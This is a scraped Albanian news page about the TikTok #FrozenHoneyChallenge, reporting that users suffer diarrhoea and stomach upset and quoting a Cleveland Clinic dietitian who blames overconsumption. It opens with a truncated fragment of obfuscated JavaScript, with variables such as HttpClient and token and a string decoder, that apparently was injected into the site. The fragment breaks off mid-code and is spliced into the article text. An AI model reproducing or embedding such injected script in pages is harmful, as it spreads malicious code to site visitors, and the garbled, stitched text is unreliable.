;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ky trend viral në TikTok po shkakton diarre tek përdoruesit

By

Trendi më i fundit në TikTok është paksa shqetësues.

Përdoruesit që po i bashkohen sfidës #FrozenHoneyChallenge, e cila ka më shumë se 90 milionë ndjekës, kanë zbuluar një efekt anësor jo dhe aq të ëmbël: diarre masive!

Trendi viral përfshin mbushjen e një shishe uji me mjaltë dhe ngrirjen e tij para se të konsumoni përzierjen e artë.

Por, pavarësisht miliona shikimeve mbi hashtag-et e ndryshëm të trendit, disa përdorues të TikTok kanë përjetuar efekte anësore negative që lidhen me konsumimin e mjaltës së ngrirë, raportoi NBC. Disa kanë pohuar se uji i mjaltit i ka bërë ata të vrapojnë në banjë me diarre ose të përjetojnë një shqetësim të përgjithshëm.

Vetë mjalti nuk po shkakton këto efekte anësore, por sasia që konsumojnë përdoruesit pasi konsumi i tepërt mund të shkaktojë diarre, ngërçe në stomak, fryrje dhe efekte të tjera të pakëndshme, tha dietologia e regjistruar në Klinikën Cleveland Kristin Kirkpatrick për NBC. /Prive.al

Artikuj të ngjashëm